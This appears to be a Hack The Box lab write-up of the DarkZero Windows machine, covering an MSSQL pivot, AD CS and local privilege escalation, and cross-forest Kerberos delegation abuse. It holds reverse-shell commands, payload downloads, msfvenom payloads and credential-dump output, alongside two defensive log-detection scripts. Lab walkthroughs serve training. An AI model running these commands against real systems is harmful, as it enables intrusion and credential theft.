Hack The Box / WINDOWS / 2026-04-04
Hack The Box — DarkZero (Windows)
Initial AD foothold with provided credentials, MSSQL linked-server pivot to darkzero.ext, AD CS abuse and local privilege escalation to SYSTEM on DC02, then cross-forest unconstrained delegation abuse to compromise DC01 and obtain root.
Target
- IP: 10.129.43.136
Machine information
As is common in real-life pentests, you start the DarkZero box with credentials for the following account:
john.w / RFulUtONCOL!
Recon
sudo nmap -sC -sV 10.129.43.136 -p- -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-05 03:15:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
|_SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info:
| 10.129.43.136:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-10-05T03:17:25+00:00; +1d20h13m45s from scanner time.
| ms-sql-info:
| 10.129.43.136:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-05T02:21:39
| Not valid after: 2055-10-05T02:21:39
| MD5: 21a1:da01:fc4d:d3e2:07c3:b653:be7c:700f
|_SHA-1: f80d:e5ac:6fa4:c5ae:8f8d:ecf2:2fa9:2333:abc7:fb75
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
|_SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
|_SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49891/tcp open msrpc Microsoft Windows RPC
49908/tcp open msrpc Microsoft Windows RPC
49963/tcp open msrpc Microsoft Windows RPC
52238/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerate SMB shares with the provided user:
nxc smb 10.129.43.136 -u 'john.w' -p 'RFulUtONCOL!' --shares
SMB 10.129.43.136 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.43.136 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.43.136 445 DC01 [*] Enumerated shares
SMB 10.129.43.136 445 DC01 Share Permissions Remark
SMB 10.129.43.136 445 DC01 ----- ----------- ------
SMB 10.129.43.136 445 DC01 ADMIN$ Remote Admin
SMB 10.129.43.136 445 DC01 C$ Default share
SMB 10.129.43.136 445 DC01 IPC$ READ Remote IPC
SMB 10.129.43.136 445 DC01 NETLOGON READ Logon server share
SMB 10.129.43.136 445 DC01 SYSVOL READ Logon server share
Add dc01.darkzero.htb and darkzero.htb to /etc/hosts.
Check LDAP auth:
nxc ldap dc01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!'
LDAP 10.129.43.136 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
LDAPS 10.129.43.136 636 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
Sync time:
sudo ntpdate dc01.darkzero.htb
Collect BloodHound data:
bloodhound-ce-python -u 'john.w' -p 'RFulUtONCOL!' -ns 10.129.43.136 -d 'darkzero.htb' -dc dc01.darkzero.htb -c All --zip
We get a zip file.
sudo bloodhound
Upload the zip.
Initial MSSQL access
mssqlclient.py -port 1433 -windows-auth 'DARKZERO'/'john.w':'RFulUtONCOL!'@dc01.darkzero.htb
We get a shell.
SELECT @@version
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
Oct 8 2022 05:58:25
Copyright (C) 2022 Microsoft Corporation
Enterprise Evaluation Edition (64-bit) on Windows Server 2025 Datacenter 10.0 <X64> (Build 26100: ) (Hypervisor)
SELECT name FROM master..sysdatabases;
name
------
master
tempdb
model
msdb
select * from master..sysservers
srvid srvstatus srvname srvproduct providername datasource location providerstring schemadate topologyx topologyy catalog srvcollation connecttimeout querytimeout srvnetname isremote rpc pub sub dist dpub rpcout dataaccess collationcompatible system useremotecollation lazyschemavalidation collation nonsqlsub
----- --------- ----------------- ---------- ------------ ----------------- -------- -------------- ---------- --------- --------- ------- ------------ -------------- ------------ ------------------------------ -------- --- --- --- ---- ---- ------ ---------- ------------------- ------ ------------------ -------------------- --------- ---------
0 1089 DC01 SQL Server SQLOLEDB DC01 NULL NULL 2025-07-29 08:14:07 0 0 NULL NULL 0 0 b'DC01 ' 1 1 0 0 0 0 1 0 0 0 1 0 NULL 0
1 1121 DC02.darkzero.ext SQL Server SQLOLEDB DC02.darkzero.ext NULL NULL 2025-07-29 08:37:16 0 0 NULL NULL 0 120 b'DC02.darkzero.ext ' 0 1 0 0 0 0 1 0 0 0 1 0 NULL 0
use_link[DC02.darkzero.ext]
SELECT system_user;
dc01_sql_svc
We are now running as the linked server's sql_svc login (dc01_sql_svc).
Capture hash with Responder
On the attacker machine:
sudo responder -I tun0
On the victim machine, in SQL console:
EXEC master.sys.xp_dirtree '\\10.10.14.159\myshare',1, 1
On the Responder terminal we get:
[SMB] NTLMv2-SSP Client : 10.129.43.136
[SMB] NTLMv2-SSP Username : darkzero-ext\svc_sql
[SMB] NTLMv2-SSP Hash : svc_sql::darkzero-ext:9ce9bc...
Save the captured hash to a file named hash and try to crack it:
hashcat -a 0 ./hash /usr/share/wordlists/rockyou.txt
It does not crack.
Command execution via SQL
In the SQL shell we can continue enumerating.
Check permissions:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
There are many permissions.
Enable xp_cmdshell:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
xp_cmdshell whoami
darkzero-ext\svc_sql
Now we can execute commands.
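From the defender's side, the two SQL steps above (xp_dirtree pointed at an attacker-controlled UNC path, then xp_cmdshell enabled and used) are exactly what a SQL Server audit rule should catch. The following is an added example written for this writeup, not code from the original post or from any tool it uses. It runs a few detection rules over constructed `timestamp|login|client|statement` records modelled on the session above; the allowlist of UNC hosts and the record format are assumptions, and the `svc_backup` login and `172.16.20.5` client are invented for contrast.

```python
import re
from dataclasses import dataclass

# Hosts that database jobs legitimately reach over UNC paths (constructed allowlist).
ALLOWED_UNC_HOSTS = {"fileserver.darkzero.htb", "dc01.darkzero.htb"}

# Extended procedures that take a path and make the service account authenticate to it.
UNC_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")
UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.-]+)\\")
# EXEC ('...') AT [linked server] or OPENQUERY(...) routes a statement through a link.
LINKED_RE = re.compile(r"\)\s*at\s+\[?[\w.$-]+\]?|openquery\s*\(")


@dataclass
class Finding:
    severity: str
    rule: str
    login: str
    statement: str


def classify(login: str, statement: str) -> list:
    """Apply the detection rules to a single T-SQL statement."""
    s = statement.lower()
    findings = []
    if "sp_configure" in s and "xp_cmdshell" in s:
        # Turning xp_cmdshell on is a configuration change, not a query.
        findings.append(Finding("high", "xp_cmdshell-enabled", login, statement))
    elif "xp_cmdshell" in s:
        findings.append(Finding("high", "xp_cmdshell-exec", login, statement))
    if any(p in s for p in UNC_PROCS):
        for host in UNC_RE.findall(statement):
            if host.lower() not in ALLOWED_UNC_HOSTS:
                # The SQL Server service account will send NTLM auth to this host.
                findings.append(Finding("medium", "unc-to-unknown-host", login, statement))
    if LINKED_RE.search(s):
        findings.append(Finding("low", "linked-server-query", login, statement))
    return findings


def scan(lines) -> list:
    """Parse 'timestamp|login|client|statement' records and collect findings."""
    findings = []
    for line in lines:
        _ts, login, _client, statement = line.split("|", 3)
        findings.extend(classify(login, statement))
    return findings


# Constructed sample records modelled on the session above (not real audit output).
LOG_LINES = [
    "2025-10-05T03:20:01Z|darkzero\\john.w|10.10.14.159|SELECT name FROM master..sysdatabases",
    "2025-10-05T03:21:10Z|darkzero\\john.w|10.10.14.159|EXEC ('SELECT system_user') AT [DC02.darkzero.ext]",
    "2025-10-05T03:22:30Z|darkzero\\john.w|10.10.14.159|EXEC master.sys.xp_dirtree '\\\\10.10.14.159\\myshare',1,1",
    "2025-10-05T03:25:40Z|darkzero\\john.w|10.10.14.159|EXEC sp_configure 'xp_cmdshell',1",
    "2025-10-05T03:25:41Z|darkzero\\john.w|10.10.14.159|EXEC xp_cmdshell 'whoami'",
    "2025-10-05T03:30:00Z|svc_backup|172.16.20.5|EXEC master.sys.xp_dirtree '\\\\fileserver.darkzero.htb\\backups',1,1",
]

if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f"[{f.severity}] {f.rule}: {f.login} -> {f.statement}")
```

The last record is there to show the allowlist doing its job: a UNC path to a known file server produces no finding, while the same procedure pointed at an unknown host does. In a real deployment the records would come from SQL Server Audit or Extended Events rather than a pipe-delimited file, but the rules themselves do not change.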
Reverse shell with nc64.exe
Download nc64.exe on the attacker machine:
wget https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe
Upload it to the victim machine.
On attacker machine, start listeners:
python3 -m http.server 5555
rlwrap nc -vlnp 4444
In SQL shell:
xp_cmdshell mkdir C:\tmp
xp_cmdshell curl http://10.10.14.159:5555/nc64.exe -o C:\tmp\nc64.exe
xp_cmdshell C:\tmp\nc64.exe -e cmd.exe 10.10.14.159 4444
We get a reverse shell.
powershell
Details about installed Windows version:
(Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion") | Select-Object -Property *
We notice:
LCUVer : 10.0.20348.2113
ProductName : Windows Server 2022 Datacenter
ReleaseId : 2009
ipconfig /all
We notice:
IPv4 Address. . . . . . . . . . . : 172.16.20.2(Preferred)
BloodHound from victim side
Download SharpHound.exe (https://github.com/SpecterOps/SharpHound) and upload it to the victim machine.
Run SharpHound on victim:
.\SharpHound.exe
A zip is created.
To download it to our machine, we can use smbserver:
smbserver.py -smb2support -username test12 -password test12 share $(pwd)
On victim machine:
net use \\10.10.14.159\share test12 /USER:test12
cp 20251004222116_BloodHound.zip \\10.10.14.159\share\
We now have the file and can upload it to BloodHound.
From BloodHound we see that the svc_sql user can enroll in several certificate templates: clientauth, efs, usersignature and user.
AD CS abuse with Certify and Rubeus
Upload Certify.exe (https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/Certify.exe) to the victim machine.
.\Certify.exe find /vulnerable
No vulnerable templates are found.
The full CA name is DC02.darkzero.ext\darkzero-ext-DC02-CA.
.\Certify.exe find /ca:DC02.darkzero.ext\darkzero-ext-DC02-CA
We see the User template, which can also be used for client authentication.
.\Certify.exe request /ca:DC02.darkzero.ext\darkzero-ext-DC02-CA /template:User
A base64 certificate is printed.
Copy it into a file cert.pem.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Set an empty password.
A cert.pfx file is created. Upload it to the victim machine.
Upload Rubeus.exe (https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/Rubeus.exe).
.\Rubeus.exe asktgt /getcredentials /user:svc_sql /certificate:cert.pfx /d:darkzero.ext /dc:dc02.darkzero.ext /show
We obtain:
NTLM : 816CCB849956B531DB139346751DB65F
In the end, this hash is not very useful by itself.
SYSTEM on DC02 via local exploit
Generate a Meterpreter reverse shell executable:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
Upload it to the target machine and set up a listener in Metasploit:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run
Run reverse.exe:
.\reverse.exe
We get a Meterpreter shell.
To understand whether there were working public exploits, I searched on cvedetails.com.
Go to https://www.cvedetails.com/.
Search for Windows Server 2022.
Find version 10.0.20348.2113.
There are vulnerabilities in 2025 and 2024.
You can inspect them.
I tried 2025 vulnerability exploits without success.
I found a working 2024 exploit. The vulnerability is: https://www.cvedetails.com/cve/CVE-2024-30038/.
The exploit is in Metasploit.
Background the current Meterpreter session with CTRL+Z.
use windows/local/cve_2024_30088_authz_basep
sessions
Copy the session id.
set SESSION <id>
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
set LPORT 7777
run
We get a Meterpreter shell.
getuid
Server username: NT AUTHORITY\SYSTEM
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
testpc$:1106:aad3b435b51404eeaad3b435b51404ee:008defc8e9f9bfb3ebca2f665d3e36b8:::
darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::
Get a nicer shell with nc64.exe, for example:
rlwrap nc -vlnp 4444
In Meterpreter shell:
shell
cd C:\tmp
.\nc64.exe -e cmd.exe 10.10.14.78 4444
We get a reverse shell.
powershell
In C:\Users\Administrator\Desktop we find the user flag.
Pivoting with Ligolo to reach DC02
From here it is easier to reach DC02 through a Ligolo tunnel.
Download Ligolo (https://github.com/nicocha30/ligolo-ng).
On attacker machine:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
On victim machine:
.\agent.exe -connect 10.10.14.159:11601 -ignore-cert
We are connected to the proxy and now have a session.
ligolo-ng » session
Select session 1.
start
Now run:
sudo ip route add 172.16.20.0/24 dev ligolo
nxc smb 172.16.20.2 -u svc_sql -H '816CCB849956B531DB139346751DB65F'
SMB 172.16.20.2 445 DC02 [*] Windows Server 2022 Build 20348 x64 (name:DC02) (domain:darkzero.ext) (signing:True) (SMBv1:False)
SMB 172.16.20.2 445 DC02 [+] darkzero.ext\svc_sql:816CCB849956B531DB139346751DB65F
Add 172.16.20.2 dc02.darkzero.ext darkzero.ext to /etc/hosts.
Verify we can contact DC02:
ping dc02.darkzero.ext
If we want a shell other than Meterpreter, we can also use smbexec.py with the Administrator hash:
smbexec.py 'darkzero.ext/Administrator@dc02.darkzero.ext' -hashes ':6963aad8ba1150192f3ca6341355eb49'
We can use secretsdump.py to dump Kerberos keys, which we will need later:
secretsdump.py 'darkzero.ext'/'Administrator'@'dc02.darkzero.ext' -hashes ':6963aad8ba1150192f3ca6341355eb49'
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:3a9616ace37521e8a05bcaf6c68e3bbf44adfc7aa997b6123b7da6e39f7d0b3c
Administrator:aes128-cts-hmac-sha1-96:5da4b74154944739351c6da76d657a7d
Administrator:des-cbc-md5:ad1c6ec1df64a1e0
krbtgt:aes256-cts-hmac-sha1-96:e1b65b38be61373cad5930ace5bb65161460324e0c42c0ea14a73e4ac2314f4c
krbtgt:aes128-cts-hmac-sha1-96:133d768fd3a1214bba00fec89d2e56c1
krbtgt:des-cbc-md5:d04f0b3d3b385b31
DC02$:aes256-cts-hmac-sha1-96:fd92bfbfbc948bef1d1a04f7c342ca606b0eb72023a421b05a80561fbf3b28e2
DC02$:aes128-cts-hmac-sha1-96:1bd1d05e0abf42edc09e0c0064c010d3
DC02$:des-cbc-md5:bf926ea2ce765d46
We can enumerate the darkzero.ext domain with BloodHound:
bloodhound-ce-python -u 'Administrator' --hashes ':6963aad8ba1150192f3ca6341355eb49' -ns 172.16.20.2 -d 'darkzero.ext' -dc dc02.darkzero.ext -c All --zip
Upload the zip to BloodHound.
Run the "Map Domain Trusts" query.
We notice there is a CrossForestTrust relationship between darkzero.htb and darkzero.ext.
It could also be found with PowerView.ps1:
Get-DomainTrustMapping
SourceName : darkzero.ext
TargetName : darkzero.htb
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/29/2025 3:30:19 PM
WhenChanged : 9/29/2025 6:25:18 PM
SourceName : darkzero.htb
TargetName : darkzero.ext
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/29/2025 3:30:19 PM
WhenChanged : 9/29/2025 6:25:18 PM
Cross-forest unconstrained delegation attack
The idea now is to perform Kerberos unconstrained delegation. Useful references:
- https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained
- https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/unconstrained-delegation.html?highlight=unconstrained#unconstrained-delegation-1
Make DC02 trusted for delegation:
python3 bloodyAD/bloodyAD.py --host dc02.darkzero.ext -d darkzero.ext --dc-ip 172.16.20.2 -u Administrator -p ':6963aad8ba1150192f3ca6341355eb49' add uac 'DC02$' -f TRUSTED_FOR_DELEGATION
[+] ['TRUSTED_FOR_DELEGATION'] property flags added to DC02$'s userAccountControl
Now we must add a fake SPN to DC02.
Download krbrelayx (https://github.com/dirkjanm/krbrelayx). In the repo there are also addspn.py and dnstool.py.
python3 krbrelayx/addspn.py -u 'darkzero.ext\Administrator' -p 'aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49' -t 'DC02$' -s host/attackersystem.darkzero.ext --additional dc02.darkzero.ext
[+] SPN Modified successfully
Now we must add a DNS record that points to us:
python3 bloodyAD/bloodyAD.py --host dc01.darkzero.htb -d darkzero.htb --dc-ip 10.10.11.89 -u john.w -p 'RFulUtONCOL!' add dnsRecord 'attackersystem.darkzero.ext' 10.10.14.78
[+] attackersystem.darkzero.ext has been successfully added
Run krbrelayx in export mode, passing it the DC02$ AES key we dumped earlier:
python3 krbrelayx/krbrelayx.py -aesKey 'fd92bfbfbc948bef1d1a04f7c342ca606b0eb72023a421b05a80561fbf3b28e2'
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
Now we force DC01 to authenticate to attackersystem.darkzero.ext. Since DC02 owns the SPN for attackersystem.darkzero.ext, DC01 will request a TGT from the KDC that includes that SPN. When it receives the TGT, DC01 forwards it to the ticket-granting server, which I assume is the one on DC02. The ticket-granting server decrypts the TGT and returns a token to DC01. Since DC02 is trusted for delegation, that token contains DC01's TGT. DC01 then sends the token to attackersystem.darkzero.ext, which resolves to our machine, so we receive it. Because we know the Kerberos key of DC02's KDC, we can decrypt the token and extract DC01's TGT.
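Two of the preparation steps above leave a clear trail in the Security log of the domain controller that processed them: setting TRUSTED_FOR_DELEGATION on DC02$ changes the account's userAccountControl, and registering host/attackersystem.darkzero.ext adds an SPN whose host name does not belong to the account. Both show up as event 4742 (computer account changed). The following is an added example written for this writeup, not code from the original post or from krbrelayx or bloodyAD. It processes constructed 4742-shaped records and assumes the record carries the old and new UAC values as hex strings and the account's full SPN list in its Service Principal Names field (shown as "-" when unchanged); the all-zero DSA GUID in the replication SPN is a placeholder.

```python
import re
from dataclasses import dataclass

# userAccountControl bits relevant to delegation abuse (values from Microsoft's UAC documentation).
UAC_FLAG_NAMES = {
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
# DC replication SPNs use a GUID as the "host" part; skip those rather than flag them.
GUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")


@dataclass
class Finding:
    rule: str
    account: str
    actor: str
    detail: str


def newly_set_flags(old_hex: str, new_hex: str) -> set:
    """Names of UAC bits present in the new value but not in the old one."""
    added = int(new_hex, 16) & ~int(old_hex, 16)
    return {name for bit, name in UAC_FLAG_NAMES.items() if added & bit}


def spn_host(spn: str) -> str:
    """Host part of service/host[:port][/name], lower-cased ('' if malformed)."""
    if "/" not in spn:
        return ""
    return spn.split("/", 1)[1].split("/", 1)[0].split(":", 1)[0].lower()


def foreign_spns(account: str, domain: str, spn_field: str) -> list:
    """SPNs whose host is neither the account's short name nor its FQDN in `domain`."""
    if spn_field.strip() in ("", "-"):
        return []
    short = account.rstrip("$").lower()
    expected = {short, f"{short}.{domain.lower()}"}
    bad = []
    for spn in spn_field.splitlines():
        host = spn_host(spn)
        if host and host not in expected and not GUID_RE.match(host):
            bad.append(spn)
    return bad


def analyze(events: list, domain: str = "darkzero.ext") -> list:
    """Run both rules over 4742 (computer account changed) records."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4742:
            continue
        acct, actor = ev["TargetUserName"], ev["SubjectUserName"]
        for flag in sorted(newly_set_flags(ev["OldUacValue"], ev["NewUacValue"])):
            # Delegation bits are set at promotion or provisioning time; a later change is suspicious.
            if flag in ("TRUSTED_FOR_DELEGATION", "TRUSTED_TO_AUTH_FOR_DELEGATION"):
                findings.append(Finding("delegation-flag-set", acct, actor, flag))
        for spn in foreign_spns(acct, domain, ev["ServicePrincipalNames"]):
            findings.append(Finding("foreign-spn", acct, actor, spn))
    return findings


# Constructed 4742 records shaped like the Security-log fields; not real exported events.
EVENTS = [
    {"EventID": 4742, "TargetUserName": "DC02$", "SubjectUserName": "Administrator",
     "OldUacValue": "0x2000", "NewUacValue": "0x82000", "ServicePrincipalNames": "-"},
    {"EventID": 4742, "TargetUserName": "DC02$", "SubjectUserName": "Administrator",
     "OldUacValue": "0x82000", "NewUacValue": "0x82000",
     "ServicePrincipalNames": "host/DC02\nhost/dc02.darkzero.ext\n"
                              "E3514235-4B06-11D1-AB04-00C04FC2DCD2/00000000-0000-0000-0000-000000000000/darkzero.ext\n"
                              "host/attackersystem.darkzero.ext"},
    {"EventID": 4742, "TargetUserName": "testpc$", "SubjectUserName": "SYSTEM",
     "OldUacValue": "0x1000", "NewUacValue": "0x1000",
     "ServicePrincipalNames": "host/testpc\nhost/testpc.darkzero.ext"},
]

if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f.rule}: {f.account} changed by {f.actor}: {f.detail}")
```

The bit arithmetic in `newly_set_flags` matters: domain controllers legitimately carry TRUSTED_FOR_DELEGATION, so alerting on the flag being present would fire constantly, while alerting on the transition from clear to set fires once, at the moment the attacker runs the UAC change. The DNS record added in the third step is not covered here; it lives in the AD-integrated zone rather than on the computer account, so it needs a separate rule.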
With Coercer we force DC01 to authenticate to our host:
coercer coerce -l 'attackersystem.darkzero.ext' -t 10.10.11.89 -u 'john.w' -p 'RFulUtONCOL!' -d darkzero.htb -v
In the terminal where krbrelayx.py is running, we get:
[*] SMBD: Received connection from 10.10.11.89
[*] Got ticket for DC01$@DARKZERO.HTB [krbtgt@DARKZERO.HTB]
[*] Saving ticket in DC01$@DARKZERO.HTB_krbtgt@DARKZERO.HTB.ccache
export KRB5CCNAME='DC01$@DARKZERO.HTB_krbtgt@DARKZERO.HTB.ccache'
secretsdump.py -k -no-pass 'darkzero.htb'/'DC01$'@dc01.darkzero.htb
We get several hashes, including:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::
To get a shell on DC01 we can use smbexec.py:
smbexec.py 'darkzero.htb/Administrator@dc01.darkzero.htb' -hashes ':5917507bdf2ef2c2b0a869a1cba40726'
Try to get a more comfortable shell with nc64.exe:
mkdir C:\tmp
curl http://10.10.14.78:5555/nc64.exe -o C:\tmp\nc64.exe
Start listener:
rlwrap nc -vlnp 4444
Execute:
C:\tmp\nc64.exe -e cmd.exe 10.10.14.78 4444
We get a reverse shell.
whoami
nt authority\system
In C:\Users\Administrator\Desktop we find root.txt with the root flag.